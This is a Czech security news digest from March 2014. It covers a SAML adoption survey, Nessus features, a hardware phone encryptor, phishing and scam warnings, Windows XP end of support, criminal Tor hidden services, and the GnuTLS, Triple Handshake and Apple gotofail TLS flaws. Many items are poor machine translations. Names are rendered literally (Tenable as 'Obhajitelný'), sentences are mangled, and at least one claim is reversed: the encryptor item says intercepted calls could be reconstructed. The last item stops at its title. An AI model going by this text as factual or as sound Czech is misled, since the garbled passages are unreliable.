OneLogin a Cloud Security Alliance oznámila, poznatky z jejich OneLogin 2014 stát průzkumu SaaS správy identit, která byla provedena s cílem lépe porozumět splatnost SaaS prodejci v jejich implementaci řešení správy identit, bezpečnostních standardů a certifikací pojištění. Nejvíce pozoruhodně, průzkum Výsledky poukazují na široké přijetí norem SAML o SaaS prodejců na jednom správy identit sign-on, v reakci na požadavky zákazníků na rychlé, jednoduché a bezpečné zaměstnanci, zákazníky a partnerské přístup k aplikacím v jejich prostředí. Tím, že odstraní všechna hesla a místo toho používat digitální podpisy pro ověřování a autorizaci přístupu k datům, SAML se stal zlatý standard pro jednotné přihlášení do cloudových aplikací. SAML-umožnil SaaS aplikace jsou jednodušší a rychlejší poskytování uživatelského ve složitých podnikových prostředích, jsou bezpečnější a pomohou zjednodušit správu identit napříč velké a různorodé skupiny uživatelů. 100 účastníků dokončilo OneLogin 2014 stát průzkumu SaaS správy identit. Klíčová zjištění patří:
SAML je standardní pro správu identit volby - 67 procent dodavatelů SaaS dnes zkoumaných použití SAML pro jednu správu identit sign-on, zatímco 19 procent uvedlo, že plánují implementovat SAML během příštích 12 měsíců. Pouze 3 procenta měl žádné plány k provedení standard.
Poptávka zákazníků, bezpečnost a rychlost pojezdu přijetí SAML - 26 procent respondentů citované poptávky od stávajících zákazníků, jako primární řidič za jejich přijetí SAML, 21 procent citované lepší zabezpečení a dodržování předpisů, a téměř 22 procent citované rychlou integraci do oblak aplikačních ekosystémů.
SAML přijetí není omezena do webového prohlížeče - 37 procent dodavatelů SaaS průzkumu pákový SAML na mobilních verzí svých aplikací, a 25 procent použití SAML pro desktopové aplikace není včetně webovém prohlížeči.
OneLogin je dlouholetým zastáncem standardu SAML. Jeho řešení cloud-based pro jedno řízení sign-on a podnikové identity je pre-integrovaná přes SAML s více než 350 podnikových aplikací, včetně Dropbox, EMC Syncplicity, Google Apps, NetSuite, Office 365, Salesforce, Pracovním a Zendesk. Kromě toho více než 150 dodavatelé SaaS, včetně Dropbox, byly použity OneLogin je svobodný open source SAML sady pro SAML povolit jejich aplikace. "Když jsme se otevřít pochází naše první SAML Toolkit před třemi lety, to byl pokus o růst ekosystém demokratizaci single sign-on a jeho zpřístupnění pro firmy jakékoliv velikosti, "řekl Thomas Pedersen, spoluzakladatel a generální ředitel pro OneLogin. "Tento průzkum ukazuje, že SAML je silnější než kdy jindy, a hybnost je poháněný poznání, že SAML poskytuje masivní zvýšení bezpečnosti tím, že umožňuje podnikům kontrolovat přístup ke svým citlivým datům."
Obhajitelný přidává správu cloud a podporu multi-skeneru Nessus
6.3.2014 Bezpečnost
Obhajitelný Network Security oznámila, výkonné funkce pro správu cloud bude doručena provozovateli tohoto uživatele Nessus v 3.března aktualizace. oddělení, týmy a odlehlých oblastech budou mít v rámci svého předplatného, schopnost řídit vnitřní a vnější skenery od primární skeneru. Nessus zákazníci s Nessus obvodu služba bude moci učinit prostřednictvím cloudu.
Obhajitelný je také zavedení nového zjednodušený pohled na skenování zjištění, postižených hostitelů a stavu shody s jedním kliknutím drill-down pro podrobnosti. Mnoho organizací má více skenerů pro různé segmenty svých sítí a zeměpisných oblastech. . Správa více zranitelností skenerů, plánování skenování a zpracování výsledků může být výzvou pro organizace s jednou osobou nebo malý tým odpovědný za zranitelnosti a testování shody Mezi hlavní nové funkce v Nessus patří:
Cloud pro správu portálu, Nessus obvodu Service lze nyní použít jako primární skeneru a bude moci ovládat více sekundárních Nessus skenery (vnitřní Nessus skenery nebo Nessus Amazon Machine Images) bez ohledu na umístění. Bez příplatku, zákazníci Perimeter služby mohou rovněž podat až dvou externích skenů za kalendářní čtvrtletí, pro validaci Tenable PCI ASV.
Multi-scanner podpora-Uživatelé mohou ovládat více sekundárních Nessus skenery (vnitřní Nessus skenery nebo Nessus Amazon Machine Images) a zobrazení výsledků testů z primárního Nessus skener na premise.
Výsledky zjednodušené skenování view-Scan výstup je nyní organizována zjištění následuje seznam dotčených hostitelů. S jedním kliknutím, mohou uživatelé rychle drill-down na hostitelské podrobnosti o této zranitelnosti. Výsledky shody ukazují, prošel / selhalo / přeskočí stav, postiženým zástupů, a důvod stavu.
"Nové funkce v Nessus stavět na rok významné konfigurace, analýzy post-skenování, a zlepšení použitelnosti," řekl Renaud Deraison, ředitel výzkumu společnosti na Tenable a vynálezce technologie Nessus. "Teď týmy, odbory a organizace mohou maximalizovat zabezpečení tak, aby odpovídala jejich potřebám a dostupné zdroje -. Ať už prostřednictvím obhajitelné v podnikové platformy SecurityCenter nebo prostřednictvím těchto nových Nessus funkcí" budou k dispozici nové Nessus funkce 3. března 2014 bez dalších poplatků na Nessus a Nessus Perimeter služeb zákazníkům.
Šifrování vojensko-grade tunel vře hlasové, textové a e-maily
6.3.2014 Šifrování
GOTrust Technology Inc oznámila, že Národní institut pro standardy technologie (NIST) udělil společnosti Federal Information Processing Standards (FIPS) 140-2 Level 3 certifikace pro jejich SDencrypter microSD pracuje na Android a mnoha dalších operačních systémů včetně Windows a Linux. FIPS 140 -certifikované výrobky jsou povinné pro americkou armádu a uživatelé Americká občanská vláda chránit citlivá data pomocí šifrování. Tato úroveň šifrování je nyní k dispozici k ochraně souborů, hlasové hovory a textové zprávy pro většinu uživatelů Android -. Ze strany vlády pro firemní prostředí Sycret Voice App spolu s SDencrypter poskytuje zabezpečení vojenské úrovni pro malé skupiny jednotlivců a velkých korporací. Vložením GO-svěřeneckého SDencrypter do slotu microSD o smartphone a stahování Sycret Voice App od Google Play úložiště, může uživatel nastavit šifrovací tunel, který se pere hlasové, textové a e-maily s jiným Android uživatele, který má stejný SDencrypter / Sycret Voice konfigurace. Alternativně, Voice mohou být přizpůsobeny, aby vyhovovaly potřebám každého jedinečného podnikatelského prostředí. Všechny šifrovací operace jsou počítány uvnitř FIPS-certifikované SDencrypter microSD s proprietární čip. Náhodné, unikátní (pro každý hovor) šifrovací klíč je generován a všechny šifrování / dešifrování zpracování (AES 256) probíhá v SDencrypter čipu. Nic v šifrovacím cyklu je počítána v otevřené na telefonu, čímž se vytváří peer to peer šifrování řetězce. Nejsou žádné tajné klíče generované, vyměněné nebo uložené na centrálním serveru, takže není informace, které mohou být hacknutý nebo obeslán. I když zašifrovaná zpráva byla zaznamenána jak to bylo přenášeny a následně oba telefony byly ukradeny nebo zabaveny, že by bylo možné rekonstruovat rozhovor (dozadu zabezpečení). Šifrované mobilní telefony historicky buď byl účelový a drahé, nebo software pouze řešení s významné omezení zabezpečení. Sycret Voice je jedinečný, při kombinaci s SDencrypter je robustní hardwarové řešení na bázi, která mohou být dodatečně na většině populárních Android smartphony, včetně Samsung Galaxy a Poznámka série, HTC, LG a Motorola telefony, zatímco ještě používá stávající telecom služby operátora. Je-li telefon aktualizovat nebo služby operátor změnil SDencrypter lze snadno přesunout do nového telefonu a nejnovější Sycret Voice APP stáhnout z Google Play obchod. Šifrované hovory využití údajů službu připojení telefonu místo na sluľbu hlasové volání. Takže tam žádné konvenční telefonní čísla, která mohou být zaznamenané pro přihlášení na původu, určení nebo trvání hovoru. Náklady na šifrované volání kdekoli na světě, je zahrnuta v plánu dat uživatele. Neomezená data jsou neomezené šifrované volání po celém světě. "GO-důvěra je jedinou společností, která poskytuje FIPS 140 certifikovaného peer-to-peer komunikaci na smartphony, tablety a další SD karty v mobilních zařízeních," řekl Darren Lee, generální ředitel společnosti Go-Trust. "To znamená, že firmy mohou mít úplnou kontrolu nad mobilním prostředí svých zaměstnanců s důvěrou zabezpečení vojenské úrovni, a to i s uživateli BYOD."
Phishingové útoky už dávno nejsou jen hloupé
6.5.2014 Phishing
V záplavě průhledných pokusů o podvod je třeba nezapomínat, že phishingové útoky mají vysoký počet obětí. Mohou totiž být překvapivě sofistikované.
Uživatelé počítačů a mobilních zařízení často trpí představou, že phishing, to jsou ty úplně naivní pokusy nalákat člověka na nesmyslné, špatnou češtinou psané, nabídky. Ano, většina phishingových útoků, například emailů, které pozorujeme, jsou opravdu hloupé. Je až neuvěřitelné, že například na email od nigerijského prince, který nabízí (samozřejmě, že za malou finanční podporu) podíl na nějakém pohádkovém bohatství, se ještě dnes může někdo chytit.
Takzvaný nigerijský podvod, známý celosvětově také jako „podvod 419“ – kde 419 je číslo příslušného paragrafu nigerijského trestního zákoníku – je jednou z variant skupiny podvodů typu „poplatek předem“. Již od osmdesátých let minulého století podvodníci rozesílali faxy se srdceryvnými příběhy a nabízeli úžasnou příležitost pomoci bližnímu v tísni a závratně při tom zbohatnout. Tak neopatrných lidí, aby byli ochotni se něčeho tak podezřelého zúčastnit, je v populaci jen mizivý podíl. Možnost rozesílat zdarma miliony emailů však tento typ podvodů stále udržuje při životě.
Na první pohled se zdá, že jediným negativním dopadem takto hloupého phishingu je zahlcená síť a balast ve schránkách uživatelů. Vedlejším efektem však může být také falešný pocit bezpečí, vyplývající z představy, že takto průhledné jsou všechny phishingové útoky. Což nejsou.
Mail z Nigérie ne. Ale od banky…
Aktuální průzkum společnosti Microsoft „Computer Safety Index Survey“, provedený na vzorku 10 tisíc uživatelů počítačů, ukázal, že 15 % se stalo obětí phishingu; průměrná uvedená ztráta je 158 dolarů. To je jasný důkaz, že phishingové útoky jsou reálným nebezpečím a že je nutné se proti nim chránit.
Díky souběžnému používání různých nástrojů online kriminality mají totiž útočníci možnost předstírat i důvěryhodnější identitu, než je fiktivní postava nigerijského prince, který chce pomoci s transferem sto milionů dolarů. Uživatel tak může dostat email, tvářící se jako pravý email od jeho skutečné banky, který obsahuje link na stránky, tvářící se jako skutečné stránky dané banky. V takovém případě už uživatele nezachrání jeho instinkt – vždyť na první pohled nevidí nic, co by mělo vzbudit jakékoli pochybnosti. Uživatele mohou zachránit pouze jeho znalosti – anebo, jako záchranná brzda, kvalitní antivirový program se sofistikovanými funkcemi, chránícími právě před phishingem.
Co se znalostí týče, uživatel musí všechny požadavky na sdělování citlivých údajů velmi pečlivě zvažovat. Měl by mít na paměti, že údaje jako PIN k platební kartě nebo přihlašovací údaje k internetovému bankovnictví nemá sdělovat nikomu, za žádných okolností – tedy bez ohledu na to, jak důvěryhodně vypadá žádost. Jinými slovy, už samotný fakt, že vůbec přijde požadavek na tyto údaje, představuje signál, že s největší pravděpodobností jde o podvod.
Pomoc od bezpečnostního software
Co se týče ochrany, kterou může poskytnout softwarové bezpečnostní řešení, uživatelé by měli mít na paměti, že právě v oblasti phishingu se jednotlivá bezpečnostní řešení významně liší. Jde totiž o relativně nové funkce a někteří dodavatelé tyto technologie do svých řešení teprve zapracovávají.
Za pozornost v této souvislosti stojí, že nejvyšší dostupné ocenění v kategorii ochrany před phishingem získal od nezávislé testovací autority AV-Comparatives produkt ESET Smart Security, resp. jeho modul Anti-Phishing. Ten zablokoval v testu AV-Comparatives nejvíc phishingových stránek ze všech testovaných produktů: jeho úspěšnost dosáhla 99 procent.
Modul Anti-Phishing pracuje s databází phishingových hrozeb, která je každých 20 minut aktualizována, a také využívá speciální algoritmy pro proaktivní ochranu. Ty kontrolují vzhled stránek s cílem eliminovat takové, které imitují pravé stránky. Tento přístup pomáhá například odhalit falešné formuláře internetového bankovnictví.
95 % bankomatů má Windows XP. Jsou naše peníze v ohrožení?
6.5.2014 Zranitelnosti
Většina peněžních automatů se spoléhá na operační systém, který brzy půjde do důchodu.
O tom, že podpora jednoho z nejoblíbenějších operačních systémů všech dob Windows XP skončí 8. dubna, jste pravděpodobně slyšeli již mnohokrát. Stejně tak vám asi netřeba připomínat, že přechod na novější verzi je dobrý nápad nejen z bezpečnostních důvodů.
Mnoho lidí přesto Windows XP stále používá. Mezi tyto nenapravitelné uživatele přitom patří i bankovní ústavy, které zastaralou platformu používají pro své bankomaty. Jakmile skončí podpora, hrozí tedy, že se těmto strojů připojeným k internetu dostane zvýšeného zájmu ze strany kyberzločinců.
Převést všechny peněžní automaty na novější verzi Windows by však rozhodně nebylo levné ani jednoduché. Jen v USA existuje asi 200 tisíc bankomatů běžících na Windows XP a jak ve své zprávě nedávno napsala CNN, změna operačního systému v jednom bankomatu by stála 1 až 3,5 tisíce dolarů. Není divu, že banky se do upgradu zrovna nehrnou.
Co to však znamená pro nás? Pokud bude většina bankomatů zranitelná vůči útokům, skutečně v sobě najdeme tu odvahu bankomaty i nadále používat? A jak vůbec poznáme, jestli vybraný bankomat používá podporovaný operační systém?
Podle CNN je tu naštěstí jedno řešení. Velké banky prý s Microsoftem jednají o možnosti prodloužené podpory pro své systémy v bankomatech. Banky tak získají více času na upgrade, kterému se stejně v budoucnu nevyhnou. Například společnost JPMorgan již údajně získala speciální prodlouženou podporu na dobu jednoho roku a v červenci hodlá spustit hromadný přechod na Windows 7. Naplánovanou aktualizaci potvrdily i další bankovní domy.
O své peníze se tedy pravděpodobně bát nemusíte. A pokud i přesto bankomatům nevěříte, stále je tu stará dobrá bankovní přepážka.
Tor skryté služby - bezpečné útočiště pro zločinci
5.3.2014 Hacking
Během několika posledních měsíců jsem se pečlivě sleduje tzv. darknet zdrojů, většinou sítě Tor. A ještě jedna věc, která je na první pohled zřejmé, je, že cybercriminal prvek roste. I když, infrastruktura Tor a cybercriminal zdroje nejsou na stejné úrovni jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době. Tam jsou také zhruba 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor.
Malware
Počítačoví zločinci se začal aktivně používat Tor hostit škodlivý infrastruktury. Zjistili jsme, Zeus se schopností Tor , pak detekován Chewbacca a nakonec jsme analyzovali první Tor Trojan pro Android . Rychlý pohled na síťových zdrojů Tor odhaluje velké množství prostředků určených na malware - C & C servery, admin panely, atd.
Hosting C & C servery Tor dělá je těžší určit, blacklist nebo odstranění.
Cythosia botnet webpanel
Ačkoli vytvoření komunikační modul Tor v malware vzorku znamená práci navíc z malware vývojáři, bude nárůst nových malware Tor-založené, stejně jako podporu Tor pro existující malware.
. Net SocksBot napevno C & C v Tor síti
Cybercriminal fóra a tržiště jsou široce známý na internetu. Některé z nich jsou veřejné, některé jsou soukromé a potřebujete souhlas nebo pozvání od stávajícího člena nebo musí být respektována osobnost v undergroundové scéně. Nyní další vrstva byla přidána - Tor podzemní tržiště. Všechno to začalo z nechvalně známé Silk Road trhu a vyvinuli desítky specializovaných trhů: drogy, zbraně a, samozřejmě, malware.
Botnet na prodej
Registrace jednoduchý postup, obchodník hodnocení, garantovaná služba a uživatelsky přívětivé rozhraní - to jsou standardní rysy Tor underground trhu. Některé obchody vyžadují prodejci složit slib - fixní částku peněz - před zahájením obchodování. To má zajistit, že obchodník je skutečný a jeho služby nejsou podvod nebo nekvalitní.
SpyEye na prodej
Finanční podvody
Carding obchody jsou pevně usadil v darknet. Odcizené osobní info je na prodej s širokou paletou vyhledávání atributů, jako je země, může banka atd. Tor kreditní karty on-line obchodů, které byly kritizovány zločinci za špatnou kvalitu, nebo za to, že falešný najít druhou šanci na život v darknet.
Online prodejna údaje ukradené kreditní karty
Nabídky nejsou omezeny na kreditní karty - skládky, sběračky a mykacího zařízení jsou také na prodej.
Obchody s ostatními mykacích zboží
Praní špinavých peněz
Bitcoins hrají důležitou roli v podzemních finančních operací. Téměř vše, co v síti Tor je kupoval a prodával pomocí bitcoins. I když iJát je téměř nemožné, aby se spojení mezi Bitcoin peněženku a skutečnou osobou, je možné, aby: sledovat bitcoin transakce, protože všechny z nich jsou průhledné a veřejné, vybudovat obchodní plán, co se děje, a zjistit nejcennější transakce provedené prostřednictvím služeb směny Bitcoin. To je důvod, proč služby praní špinavých peněz existují na Tor. Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité.
Praní špinavých peněz služba
Závěry
Rostoucí počet Tor skrytých služeb a snadnost, s níž se může být nasazen přitahuje stále více a více zločinci v darknet.
Malware vývojáři používat Tor více a více pro různé úkoly malware souvisejících
Finanční podvody a praní špinavých peněz jsou důležitými aspekty sítě Tor.
Mystery shopper: Dejte si pozor na podvody
5.3.2014 Spam
Nabídky pracovat jako Mystery Shopper jsou společné trik používají podvodníci. Dávají vám možnost pracovat ve svém volném čase, a pokud budete souhlasit, že vám poslat falešný šek s obrovskou sumu peněz, která by měla kompenzovat náklady na zboží a výzkumu. Veškeré zbývající peníze, které zbyly po práci se vrátil na podvodníky. Když banka zruší kontrolu jako falešné, tajemství shopper je vlevo z kapsy.
Ale jak uživatelé stále více vědomi nebezpečí, on-line, podvodníci museli uchýlit k různým typům triků k dosažení svých cílů, jako je například zatajování Scammer zásilky jako zásilky od velké společnosti, která se specializuje na práci s tajnými nakupujících. Zpráva zaslána jménem Mystery Shopper as, vyzváni uživateli podívat se na popis pracovního místa, ale odkaz připojen vedla k jinému prostředku, který také se specializuje na tento typ výzkumu trhu.
Skutečná adresa stránky Scammer byla odhalil po kliknutí na odkaz v příloze. Je zřejmé, že to nemá nic společného s oficiálními zdroji Mystery Shopper Inc.
Podvodné stránky popsané výhody pracuje jako "mystery shopper". Chcete-li získat práci byl uživatel vyzván k vyplnění formuláře s osobními údaji (jméno a příjmení, věk, poštovní adresu a e-mail).
Naplnil jsem ho a odpověď obdržel zprávu s podrobným průvodcem o výzkumné činnosti jako "mystery shopper". Zpráva skončil s příslibem, že kontrola všech nákladů bude zaslána na uvedenou adresu. Největší prozradí, že to byl podvod byl volný schránky uvedeno v kontaktních údajích, a to e-mail ze společnosti, která se údajně poslal zprávu.
Vyhněte se tento druh podvodu dodržováním několika jednoduchých pravidel: ignorovat dopisy ze zdrojů nejste registrovaných a pečlivě studovat adresy v přiložených odkazech. Pokud tak učiníte, že tam bude málo pokušení platit spoustu peněz za falešný šek.
"Dárek" k významným zákazníkům společnosti Apple
5.3.2014 Spam
V lednu jsme zjistil phishing poštu, která byla odeslána na účet společnosti Apple. Zprávy obsahovaly nabídku na koupi karty dává slevu ve výši 150 eur v jakékoliv evropské AppStore za pouhých 9 eur. Odesílatelé také zdůraznil, že pouze oceňují zákazníci byli oprávněni obdržet kartu.
Chcete-li objednat pro karty, Apple fanoušci museli otevřít přiložený HTML stránku a vyplňte všechna pole, jako jsou informace o platební kartě uživatele, včetně tří-místného bezpečnostního kódu, uvedeného na zadní straně karty.
Výměnou, podvodníci slíbil poslat slevovou kartu e-mailem do 24 hodin. Ale zřejmě to byl jen další podvod na trik uživatelům. Podvodníci také použít logo Apple a automatizované odběry na konci zprávy se zmást oběti.
Podvodníci se nejen zaměřit přihlašovacích jmen a hesel pro osobní účty, ale i bankovních informací uživatelů, a za účelem dosažení jejich cíle jsou ochotni slíbit cokoli. Nezkušení uživatelé mohou najít to těžké vidět skrz podvodu, ale žádosti o důvěrné informace nebo údaje, bankovní, které umožňuje přístup k osobním účtům jsou jasným důkazem toho, podvod typu phishing.
GnuTLS Ověření certifikátu Chyba odhaluje linuxových distribucích, Apps Attack
5.3.2014 Zranitelnosti
GnuTLS, open source SSL a implementace TLS používá ve stovkách softwarových balíků, včetně Red Hat ploše a serverových produktů a všech distribucích Debian a Ubuntu Linux je nejnovější šifrovací balíček nesprávně ověřit digitální certifikáty jako autentické. Zranitelnost, objevil a včera inženýry na Red Hat, klade jakékoliv stránky či aplikace v závislosti na GnuTLS na riziko zneužití.
"Bylo zjištěno, že GnuTLS nebyl správně zpracovat určité chyby, které by mohly nastat během ověření certifikátu X.509, přimět to, aby nesprávně hlásit úspěšné ověření," řekl Red Hat v poradenství vydané v pondělí. "Útočník by tuto chybu vytvořit speciálně vytvořený certifikát, který by mohl být přijat GnuTLS jako platné pro zvolenou útočníkem místě."
Zranitelnost je děsivé podobnosti a chyby hlášené Apple ve svém mobilním operačním systémem iOS a OS X pro počítače Mac. Nyní známý jako goto selhání chyba, oddělené skvrny byly vydány na zranitelnost, která odstranila kontroly SSL certifikát z příslušných operačních systémů.
"To je opravdu tak zlé, jak to jen jde," řekl Kenneth White, bezpečnostní expert a hlavní vědecký pracovník sociálních a vědeckých systémů v Severní Karolíně. "Útočník může triviálně navázat libovolnou doménu a aby to vypadalo, autoritativní a důvěryhodný pro žadatele. Tak, a to nejen odposlech citlivých kanálů, ale [také] potenciálně podkopat důvěryhodný balíček proces podepisování stejně. "
Bílá odhaduje, že více než 350 balíčků, které spoléhají na GnuTLS kryptografických knihovnách, kromě populárních linuxových distribucí, hlavní crypto a poštovních knihoven, jako libcrypt a libmailutils a cURL jsou ovlivněny.
"CURL (libcurl3-GnuTLS), dále se používá aktualizací systému balení jak pro OpenPGP (gnupg2 a gnupg-curltransport), stejně jako systém balíček updater sám (apt-transport-https)," řekl White. "Ale co je zvláště obtížné, je pochopení nesčetné následné závislosti, jako je například XML parserů, atd. Obecně platí, Debian a Ubuntu se vyvaroval OpenSSL licenčních důvodů, takže tam skutečně existují Nginx a Apache nainstaluje, že použití GnuTLS stejně."
GnuTLS vydal poradenství , potvrzuje zranitelnost a že byla objevena během auditu GnuTLS pro Red Hat. Vyzývá uživatele, aby upgrade na nejnovější verzi GnuTLS 3.2.12 nebo 3.1.22 nebo aplikovat patch pro GnuTLS 2.12x. Red Hat Enterprise Linux Desktop, HPC Node, Server a Workstation v. 6, stejně jako Red Hat Enterprise Linux Server USA a EUS v 6,5ar ovlivněny, Red Hat uvedl ve svém poradenství.
Nedávná Apple chyba přinesl tento problém do popředí. Apple vydal záplatu na 21.února pro iOS a dny později na OS X. Útočník s mužem ve středním umístění v síti by mohlo představovat neplatný certifikát, který by projít kontroly obvykle navrženy tak, aby odmítnout takovou cert . Útočník by pak mohl sledovat komunikaci a síťový provoz myslel, že je v bezpečí.
Podpora Windows XP v Číně bude také ukončena
5.3.2014 Zranitelnosti
Microsoft uvedl, že nezměnil svou politiku ukončení podpory pro Windows XP ani v Číně a „odstřihne“ uživatele tohoto více než dvanáct let starého operačního systému po 8. dubnu od bezpečnostních aktualizací stejně tak, jako uživatele jinde na světě.
„Ohledně podpory operačního systému Windows XP se vůbec nic nezměnilo,“ uvedla mluvčí Microsoftu v emailu na přímý dotaz, zda Číňané budou mít zvláštní podmínky. Microsoft totiž nedávno uvedl, že spolupracuje s několika čínskými poskytovateli antivirů na zajištění bezpečnostní podpory XP i po 8. dubnu a bude těmto firmám poskytovat informace o nově nalezených zranitelnostech tak, aby tomu mohli přizpůsobit svá řešení. Některá média pak tuto informaci mylně interpretovala tak, že americký gigant plánuje v Číně aktualizovat Windows XP i po 8. dubnu 2014.
„Čínská pobočka Microsoftu úzce spolupracuje s čínskými poskytovateli bezpečnostního softwaru jako Tencent tak, aby byla zaručena bezpečnost čínských uživatelů Windows XP před tím, než přejdou na novější verzi našeho operačního systému,“ uvedl Microsoft na svých webových stránkách.
Dnešní oznámení mluvčí Microsoftu bylo podobné jako to, které Microsoft učinil ve Spojených státech v lednu. Před dvěma měsíci Microsoft přehodnotil svá dřívější rozhodnutí a uvedl, že bude nabízet bezplatný antivirový program Security Essentials pro XP až do 14. července 2015, tedy i více než rok poté, co přestane vydávat opravy pro svůj zastaralý OS. O několik dnů později Microsoft potvrdil, že bude také nadále distribuovat pro uživatele XP do stejného data svůj nástroj s názvem Malicious Software Removal Tool (MSRT).
Německá společnost AV-Test, jež se zabývá pravidelným hodnocením antivirových produktů pro Microsoft, nedávno uvedla, že podle jejích průzkumů většina výrobců antivirů bude pro uživatele Windows XP poskytovat aktualizace databází i poté, co Microsoft ukončí jejich podporu.
Podle nejnovějších statistik analytické společnosti Net Applications byly Windows XP v únoru nainstalovány na 29,5 % všech počítačů na světě. A značné množství uživatelů XP je v Číně. Jak však Microsoft dnes potvrdil, ani Čína nedostane speciální výjimku. „Naše rada uživatelům zůstává pořád stejná – přejděte z Windows XP na moderní operační systém jako Windows 8.1,“ dodala mluvčí.
Microsoft včera mimo jiné vydal nástroj s názvem PCmover Express for Windows XP, který uživatelům usnadní přenos dat, nastavení a profilů z Windows XP na novější verzi jeho OS. Tato aplikace, již vyvinul ve spolupráci se společností Laplink, má být na konci týdne dostupná zcela zdarma na webu windowsxp.com.
Triple Handshake Cookie Cutter
4.3.2014 Počítačový útok
Výzkumy vydali dokument popisující několik chyb v protokolu TLS (Transport Layer Security). Některé útoky jsou známy již nějakou dobu, ale papír v sobě spojuje a vysvětluje jim pěkně, a také přidává několik opravdu chytrých nových nápadů. Triky se spoléhají na řezání zasedání vypnout a znovu-spuštění je tak, že klient a server skončit s jiným (bezpečnostním) stavu. Plná výzkum je k dispozici zde https://secure-resumption.com/ . Dobrou zprávou je, že (a) hlavní dopad je zřejmě omezena na připojení, které používají na straně klienta, certifikátů, což je vzácné, a (b) se vědci informovali dodavatele prohlížeče brzy, a některé prohlížeče a TLS knihovny jsou již záplatovaný .
Apple konečně záplaty kritické SSL chybu v OS X
4.3.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, které, mimo jiné, záplaty neslavný "gotofail" chybu , jejíž existence byla veřejně odhalil minulý pátek. chyba byla původně záplatovaný na iOS a Apple TV s aktualizacemi vytlačila téhož dne, ale OS Uživatelé X byly ponechány se ptát, proč oprava nebyla stanovena i pro ně.
Chyba z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS. Bezpečnostní výzkumníci byli volání pro Apple, aby si pospíšil s oprava, a vytvořili testovací stránky že uživatelé OS X mohl navštívit Safari, zda byly v ohrožení. . Firefox a Chrome použití se doporučuje v mezidobí jako chyba neměla vliv těchto prohlížečů Je zajímavé si uvědomit, že poznámky k verzi pro OS X v10.9.2 Mavericks aktualizace nezmínil chyba je pevná - člověk musel podívat na bezpečnostní stránku Apple pro nová verze, aby zjistil, že to byl (a vidět to, co ostatní věci byly vylepšeny a oprava). Uživatelé jsou vyzýváni, aby aktualizovali své systémy co nejdříve, ale jako Andrew Cunningham uvedeno, přes-400mb aktualizace by mohlo způsobit problémy pro organizace, které mají testovat aktualizace před jeho provedením na svých systémů. "Menší samostatný aktualizaci, která je stanovena pouze goto selhání chyba by být lepší volbou pro podniky," řekl poukázal . Bohužel, v tomto případě musíme brát to, co jsme může dostat, a neočekávám, že Apple komentář nebo vysvětlit, že konkrétní rozhodnutí. Zajímalo by mě, i když, pokud budou nakonec podělit, jak byla chyba objevena, a kým - zejména s ohledem na spekulace .
RSA Coviello: Historický posun v používání IT se mění společnost a kulturu
4.3.2014 Bezpečnost
Ve svém úvodním keynote na konferenci RSA 2014 , Art Coviello, výkonný viceprezident společnosti EMC Corporation a předseda představenstva RSA, vyzval k mezinárodní vládní a průmyslové spolupráci v zásadních otázkách, včetně kybernetické války, dozor, soukromí a důvěry na internetu. "napětí mezi a mezi protichůdnými zájmy vlád, podniků a jednotlivců v digitálním světě by nemělo být překvapením. Informace se staly snadno dostupné, a cennější, "řekl Coviello. "Jsme uprostřed zásadní a historické posun v užívání informačních technologií, posun, který již má monumentální důsledky pro budoucnost naší společnosti a kultury. Rychlý rozvoj a demokratizaci technologií přinesl agendy různorodých skupin . shazovat spolu s nepředvídatelnými důsledky " kloubové Coviello čtyři hlavní zásady podpořit diskusi a opatření ze strany všech účastníků se společným osobní zájem na zajištění bezpečnější internet:
Zřekly použití kybernetických zbraní , a využití internetu pro vedení války.
"Musíme mít stejnou hrůzu do kybernetické války, stejně jako my jadernou a chemickou válku."
Spolupracovat při vyšetřování, zadržení a stíhání kybernetických zločinců.
"Jediní, vyplývající výhody od vlády se snaží získat výhodu nad sebe na internetu, jsou zločinci. Náš nedostatek okamžité, důsledné a trvalé spolupráce, na celém světě, poskytuje jim odpovídající bezpečných útočišť. "
Ujistěte se, že hospodářská činnost na internetu, můžete pokračovat nespoutané a že jsou dodržována práva duševního vlastnictví.
"Přínosy pro nás všechny ze zlepšení produktivity v obchodu, výzkumu a komunikace jsou příliš cenné na to dosáhnout dohody. Právní stát musí rozhodnout ! "
Respekt a zajištění soukromí všech jednotlivců.
"Naše osobní údaje se stal pravdou měnou digitálního věku. I když je důležité, že nejsou využívány, to je ještě důležitější, že naše základní svobody jsou chráněny., ale s naší osobní svobody přichází odpovědnost. Vlády mají povinnost vytvářet a prosazovat rovnováhu ... rovnováhu na základě modelu oceňování reálnou správy a transparentnosti. "
Coviello také argumentoval pro změny v NSA a zpravodajských organizací po celém světě, aby přijaly model řízení, který jasněji oddělí své obranné a zpravodajské shromažďování role. Poznamenal, že digitální technologie, Big dat a rozvoj internetu věcí jsou klíčovými prvky co on odkazoval se na jako "historický posun v používání informačních technologií." Dodal, že digitální možnosti dnes mají pravomoc řešit mnohé z našich společenských neduhů, ale mají také moc zničit a musí být dohodnuté normy pro jejich přijatelné využití. "Musíme dát dohromady partikulární zájmy tak, aby životní prostředí pozitivní dialog je postaven," řekl. "Naléhavě potřebujeme tyto systémy být inteligentní a dost integrovaný automatizovat odpovědi, které izolovat znemožňovaly prvky a prevenci škod, a to nejen v dnešním hardwaru definované infrastruktury, ale také v nové generaci softwaru definované sítě a infrastruktury, "řekl. Ve věku uživatelem definované oblasti IT, Coviello vysvětlil potřebu více inteligence založené na přístupu k identifikačních systémů, které umožňují bezpečnostní týmy do rovnováhu mezi potřebami uživatelů a IT oddělení a zároveň je schopen prosazovat politiku na uživatelských zařízení. On pokračoval vysvětlit, že správa identity musí být spravovány v obou mobilních a cloudových prostředích, uznává, že nová řešení, je zapotřebí, aby "... přizpůsobit se vývoji identity ve věku uživatelem definované IT." Coviello uzavřena opakuje jeho volat na vlády, aby přijaly čtyři zásady a vyzvala bezpečnostního průmyslu odvést svůj díl práce na vytváření bezpečných rámce a technologie potřebné pomoci zajistit bezpečnější a více důvěryhodný digitální svět.
Nové ochranné mechanismy Microsoft přezkušování Emet je
4.3.2014 Bezpečnost
